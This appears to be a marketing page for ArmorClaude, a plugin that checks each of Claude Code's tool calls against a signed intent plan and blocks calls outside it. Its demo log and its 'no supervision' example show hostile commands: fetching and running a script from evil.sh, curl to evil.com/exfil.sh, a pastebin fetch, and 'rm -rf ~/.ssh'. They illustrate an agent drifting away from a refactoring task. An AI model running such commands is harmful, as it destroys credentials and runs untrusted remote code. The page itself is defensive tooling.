// CLAUDE_CODE · PLUGIN

ArmorClaude

Intent-based security enforcement for Claude Code.

Every tool call Claude makes is verified against a signed intent plan before it runs. No surprises. No silent drift. Full audit trail.

View on GitHub

// one-line install$ curl -fsSL https://armoriq.ai/install_armorclaude.sh | bash

14:23:41BLOCKEDBash · curl evil.com/exfil.sh14:23:38ALLOWEDRead · auth/middleware.ts14:23:35ALLOWEDEdit · auth/middleware.ts14:23:30BLOCKEDWebFetch · pastebin.com/raw/abc14:23:24ALLOWEDBash:test · npm run test:auth14:23:18DENIEDintent drift · token expired14:23:11ALLOWEDRead · package.json14:23:04BLOCKEDBash · rm -rf ~/.ssh14:23:41BLOCKEDBash · curl evil.com/exfil.sh14:23:38ALLOWEDRead · auth/middleware.ts14:23:35ALLOWEDEdit · auth/middleware.ts14:23:30BLOCKEDWebFetch · pastebin.com/raw/abc14:23:24ALLOWEDBash:test · npm run test:auth14:23:18DENIEDintent drift · token expired14:23:11ALLOWEDRead · package.json14:23:04BLOCKEDBash · rm -rf ~/.ssh

// THE_RISK

Claude acts before you can review

Claude Code is powerful. That's the problem. In a single turn it can read your configs, write to your filesystem, call external APIs, and run shell commands - all without your team knowing why.

Traditional security tools check who accessed what. They can't verify why. ArmorClaude closes that gap by binding every tool call to a declared, cryptographically signed intent plan.

Same prompt. No supervision. Quiet drift.

$ claude
> "Refactor the auth middleware to use cookies"
✓ Read auth/middleware.ts
✓ Edit auth/middleware.ts
✓ WebFetch https://pastebin.com/raw/abc123
✓ Bash curl -sSL evil.sh | bash
✓ Bash rm -rf ~/.ssh
# session ends · no audit · no trail

Toggle cycles every 6s. Hover to hold.

// THE_SOLUTION

Claude proposes. ArmorClaude approves.

ArmorClaude binds every tool call to a signed intent plan.

Before Claude runs a tool, ArmorClaude makes Claude declare what it intends to do. Every tool call is checked against that declaration. Drift gets denied. The receipt writes itself.

// HOW_IT_WORKS

01// DECLARE

Intent plan captured

At UserPromptSubmit, Claude is asked to call register_intent_plan first. It produces a structured plan, signed with a TTL.

02// VERIFY

Every tool checked

At PreToolUse, ArmorClaude verifies the tool is in the plan, checks token TTL, evaluates policy rules, and optionally verifies CSRG Merkle proofs.

03// AUDIT

Audit log emitted

At PostToolUse, every tool result is logged to ArmorIQ IAP. With an API key, logs carry signed JWT tokens and optional Merkle proofs.

// FOUR_BLOCKSwhat gets stopped

01
Intent drift blocked
Tool calls not in the declared plan are denied before they run.
// PreToolUseBLOCKED
02
Token-scoped execution
Every session gets a signed intent token with a configurable TTL.
// PreToolUse · tokenEXPIRED → BLOCKED
03
PCI / PHI / PII detection
Automatic data-class detection in tool parameters at the hook layer.
// PreToolUse · argsPII MATCH → BLOCKED
04
Fail-closed security
No intent token, expired token, or planning failure means all tools are blocked.
// any hookFAIL-CLOSED

60s

Intent TTLconfigurable, default

Lifecycle hooksclaude code 2.x

5 min

Time to installone-line curl

// INSTALL

Up and running in 5 minutes

// one-line installInstall with one command

install_armorclaude.sh// step 02

// alternativeOr install manually via the Claude marketplace:

claude plugin marketplace add armoriq/armorClaude
claude plugin install armorclaude@armoriq

// step 01
Check requirements
You need Claude Code 2.x and Node.js 20+. An ArmorIQ API key is optional, local enforcement works without one.
```
claude --version   # need 2.x
node --version    # need v20+
```

// step 03

Verify the plugin is active

claude plugin list
# ❯ armorclaude@armoriq  Status: ✔ enabled

claude mcp list | grep armorclaude
# plugin:armorclaude:armorclaude-policy: ✓ Connected

// step 04
Connect to ArmorIQ (optional)
Get a free API key at armoriq.ai. Without it, ArmorClaude still enforces local policies and intent.
```
export ARMORIQ_API_KEY=your_key_here
```
Or set it via /plugin → Configure → api_key inside Claude Code.

// DEEP_DIVE

Configuration, environment & policy reference

Click any row to expand. Every setting, command, and hook is documented here.

Seven Claude Code lifecycle hooks. Zero changes to your workflow.

SessionStart01

Session initialized

Prints active mode (ENFORCING / MONITOR) in context. Sets up session state and prunes stale sessions.

UserPromptSubmit02

Intent plan captured

Injects a directive telling Claude to call register_intent_plan first. Claude produces a structured plan, no extra API calls.

PreToolUse03

Every tool checked

Verifies the tool is in the plan, checks token TTL, evaluates policy rules, and optionally verifies CSRG Merkle proofs.

PostToolUse04

Audit log emitted

Every tool result is logged to ArmorIQ IAP. With an API key, logs carry signed JWT tokens and optional Merkle proofs.

// EXECUTION_FLOW · seven hooks, three phasesread top to bottom

All settings work as env vars or via the Claude Code plugin config UI.

Plugin settings// Prompted on first enable via /plugin → Configure

Key	Default	Description
`api_key`	`none`	ArmorIQ API key, stored encrypted, never logged
`mode`	`enforce`	enforce blocks on failure · monitor logs only
`intent_required`	`true`	Require a signed intent plan before any tool runs
`crypto_policy_enabled`	`false`	Enable Merkle tree policy binding (CSRG)
`use_production`	`true`	Use production ArmorIQ endpoints

Environment variables// Set in your shell or .env file

Key	Default	Description
`ARMORCLAUDE_MODE`	`enforce`	enforce blocks failures, monitor logs only
`ARMORCLAUDE_INTENT_REQUIRED`	`true`	Block tool calls that have no intent token
`ARMORIQ_API_KEY`	`none`	ArmorIQ SDK API key for backend audit and CSRG
`ARMORCLAUDE_VALIDITY_SECONDS`	`60`	Intent token TTL in seconds
`ARMORCLAUDE_DEBUG`	`false`	Enable verbose debug logging to stderr
`ARMORCLAUDE_DATA_DIR`	`~/.claude/armorclaude`	Runtime data and policy storage
`ARMORCLAUDE_AUDIT_ENABLED`	`true*`	Send audit logs to ArmorIQ IAP (* when API key set)
`ARMORCLAUDE_CRYPTO_POLICY_ENABLED`	`false`	Enable Merkle tree policy binding

Enforce mode// Recommended for production

Blocks any tool call that fails a policy or intent check. Hard deny, no fallthrough.

// shell

ARMORCLAUDE_MODE=enforce claude

Monitor mode// Good for onboarding

Logs all violations but never blocks. Use while tuning policies before going live.

// shell

ARMORCLAUDE_MODE=monitor claude

Inline policy commands

Type directly into the Claude Code chat prompt.

Policy listShow all active rules
Policy new: deny WebFetchBlock all web fetch calls
Policy new: block Bash for payment dataBlock Bash touching payment data
Policy get <id>Inspect a specific rule
Policy update <id>: allow writeModify an existing rule
Policy delete <id>Remove a rule
Policy resetClear all rules

See it in action

What happens when you run Claude Code with ArmorClaude active.

// session start

$ claude
# ArmorClaude active (ENFORCING, intent=required)

// allowed

# register_intent_plan({ steps: ["Read README.md"] })
✔  ArmorClaude: tool in plan (Read)

// blocked

✘  ArmorClaude intent drift: tool not in plan (Bash)

Plugin lifecycle

// management

claude plugin update armorclaude
claude plugin disable armorclaude
claude plugin enable  armorclaude
claude plugin uninstall armorclaude

CLAUDE_CODE · PLUGIN

Ready to enforce intent in your Claude Code sessions?

Live Intent Assurance↗

Connect to ArmorIQ to get signed tokens, audit logs, and cryptographic proofs for every agent action.

Connect to ArmorIQ View on GitHub

ArmorClaude

Claude acts before you can review

Claude proposes. ArmorClaude approves.

Intent plan captured

Every tool checked

Audit log emitted

Intent drift blocked

Token-scoped execution

PCI / PHI / PII detection

Fail-closed security

Up and running in 5 minutes

Check requirements

Verify the plugin is active

Connect to ArmorIQ (optional)

Configuration, environment & policy reference

Session initialized

Intent plan captured

Every tool checked

Audit log emitted

Ready to enforce intent in your Claude Code sessions?